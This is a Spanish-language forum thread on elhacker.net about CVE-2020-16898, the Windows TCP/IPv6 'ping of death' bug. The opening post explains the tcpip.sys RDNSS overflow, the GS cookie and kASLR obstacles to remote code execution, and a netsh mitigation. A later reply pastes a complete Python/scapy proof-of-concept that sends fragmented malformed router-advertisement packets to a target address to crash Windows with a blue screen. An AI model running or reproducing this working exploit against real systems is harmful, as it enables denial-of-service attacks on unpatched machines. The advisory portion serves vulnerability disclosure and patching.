elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Ping de la muerte para Windows 10 (Ipv6)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ping de la muerte para Windows 10 (Ipv6)  (Leído 8,002 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.639


La libertad no se suplica, se conquista


Ver Perfil WWW
Ping de la muerte para Windows 10 (Ipv6)
« en: 15 Octubre 2020, 22:44 pm »

Estas vulnerabilidades, causadas por un error en el controlador TCP/IP de Windows, se remontan a la vulnerabilidad “Ping de la muerte” corregida en 2013. Hacen posible la denegación de servicio y la posible ejecución remota de código.

La vulnerabilidad en tcpip.sys, un error lógico en la forma en que el controlador analiza los mensajes ICMP, se puede activar de forma remota con un mensaje router advertisement IPv6 especialmente diseñado que contenga una opción de servidor DNS recursivo (RDNSS). La opción RDNSS normalmente contiene una lista de las direcciones IPv6 de uno o más servidores DNS recursivos.




Hay una falla lógica en tcpip.sys que puede explotarse creando un paquete de router advertisement que contenga más datos de los esperados, lo que da como resultado que el controlador coloque más bytes de datos en su pila de memoria de los previstos en el código del controlador, por lo que se produce un desbordamiento de búfer. En teoría, esto podría usarse tanto para denegación de servicio como para ataques de ejecución remota de código. Pero en la práctica, lograr la ejecución remota de código sería extremadamente difícil.

SophosLabs desarrolló su propia prueba de concepto para un ataque, basada en la información proporcionada por Microsoft. Aprovechando la vulnerabilidad para causar una “pantalla azul de la muerte” BSOD en el ordenador de la víctima. Los detalles de la POC no los publicamos por ahora para evitar la explotación por parte de ciberdelincuentes.

Una vez que entendimos el error, desarrollar una prueba de concepto de “Pantalla azul de la muerte” fue bastante sencillo. Pero llevarlo al nivel que Microsoft advirtió es posible (la ejecución remota de código) no es tan sencillo. Los estándares y prácticas de codificación modernas ralentizarían el esfuerzo por construir un exploit RCE genérico confiable, por dos razones.

Primero, TcpIp.sys se compila con bandera GS, que evita que un desbordamiento de pila típico controle directamente la dirección de retorno.



La cookie de pila, también conocida como canario de pila, es un valor aleatorio generado en el momento de la carga. Su valor es XOR con el puntero de pila, lo que hace que sea extremadamente difícil predecir de manera confiable, especialmente en una explotación remota completa.




Hay dos técnicas típicas que se utilizan para omitir los canarios de pila, ninguna de las cuales se aplica realmente en este caso:

    Usar otra vulnerabilidad de fuga de información (lectura arbitraria), que no ayudará mucho a explotar tcpdrv.sys, porque el valor canario es XOR con el puntero de pila.
    Sobrescritura de un controlador de manejo de excepciones estructurado (SEH), que sería útil solo si se ha establecido un registro de excepción estructurado, que no es el caso.

El segundo obstáculo para una explotación eficaz de la RCE es la aleatorización del diseño del espacio de direcciones del kernel (kASLR). Incluso si fuera posible, puede predecir de manera confiable el canario de la pila (bastante improbable) para regresar a un shell del sistema en modo de usuario que requeriría determinar correctamente (y nuevamente de forma remota) la dirección base del kernel de Windows.

Eso significa que incluso cuando la naturaleza exacta del error en tcpdrv.sys se haga más conocida, puede pasar algún tiempo antes de que alguien pueda explotarlo de una manera que inyecte código de manera confiable en el espacio del kernel de Windows. Aun así, la amenaza de denegación de servicio a voluntad con un paquete de fácil elaboración debería ser suficiente por sí sola para provocar un parcheo rápido, que es la única solución real para esta vulnerabilidad.

Otras mitigaciones a corto plazo para posibles ataques de denegación de servicio incluyen:

    Desactivar IPv6 si no se utiliza, o
    Obligar a Windows a descartar los paquetes de router advertisement usando el comando

Código:
netsh (netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable).




Citar
In a proof-of-concept published on October 13, 2020, the SophosLabs Offensive Security team demonstrates one possible exploit against a bug in Windows computers that can remotely execute code simply by sending a specially crafted IP version 6 packet at a vulnerable computer. While this demo does not show remote code executing, it does show that the exploit path for the bug is functional (but has been mitigated by protections Microsoft introduced into Windows 10) and demonstrates that this PoCg is capable of causing a "blue screen of death" on Windows computers, which may create other problems. With additional work, it will be possible, eventually, to execute arbitrary code without crashing the PC in the process.

Fuentes:
https://news.sophos.com/es-es/2020/10/14/la-razon-principal-para-instalar-los-parches-de-microsoft-de-octubre-de-2020-ping-de-la-muerte-redux/

https://blog.elhacker.net/2020/10/actualizaciones-de-seguridad-productos.html
« Última modificación: 15 Enero 2021, 20:07 pm por el-brujo » En línea

BloodSharp


Desconectado Desconectado

Mensajes: 812


¡ Hiperfoco !


Ver Perfil WWW
Re: Ping de la muerte para Windows 10
« Respuesta #1 en: 16 Octubre 2020, 00:53 am »

Esto únicamente afecta a IPv6, ¿De casualidad tendrías el POC de python que se muestra en el video? Me gustaría probarlo en mi propia red... :o


B#
En línea



el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.639


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Ping de la muerte para Windows 10
« Respuesta #2 en: 19 Octubre 2020, 16:24 pm »

Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py


Código
  1. #!/usr/bin/env python3
  2. #
  3. # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
  4. #
  5. # Author: Adam 'pi3' Zabrocki
  6. # http://pi3.com.pl
  7. #
  8.  
  9. from scapy.all import *
  10.  
  11. v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
  12. v6_src = "fe80::24f5:a2ff:fe30:8890"
  13.  
  14. p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
  15. p_test = p_test_half + 'A'.encode()*4
  16.  
  17. c = ICMPv6NDOptEFA();
  18.  
  19. e = ICMPv6NDOptRDNSS()
  20. e.len = 21
  21. e.dns = [
  22. "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
  23. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  24. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  25. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  26. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  27. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  28. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  29. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  30. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  31. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
  32.  
  33. pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
  34.      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
  35.  
  36. p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
  37.              IPv6ExtHdrFragment()/pkt
  38.  
  39. l=fragment6(p_test_frag, 200)
  40.  
  41. for p in l:
  42.    send(p)
  43.  
  44.  
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ping De La Muerte
Dudas Generales
CaZ4d0R 9 18,142 Último mensaje 14 Julio 2010, 11:35 am
por mnemonic
Duda "ping de la muerte" « 1 2 »
Dudas Generales
ANTRUCK 10 9,727 Último mensaje 11 Agosto 2011, 23:40 pm
por WHK
Microsoft anuncia la muerte de su lector PDF para Windows 10
Noticias
wolfbcn 0 1,598 Último mensaje 27 Noviembre 2017, 02:21 am
por wolfbcn
Duda acerca del "Ping de la muerte"
Seguridad
mark010 7 3,915 Último mensaje 31 Marzo 2020, 05:30 am
por engel lex
PoC Proof-of-Concept - Ping de la Muerte | BSOD exploit for CVE-2020-16898 | Windows TCP/IPv6
Bugs y Exploits
el-brujo 1 3,344 Último mensaje 19 Enero 2021, 13:19 pm
por Usuario887
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines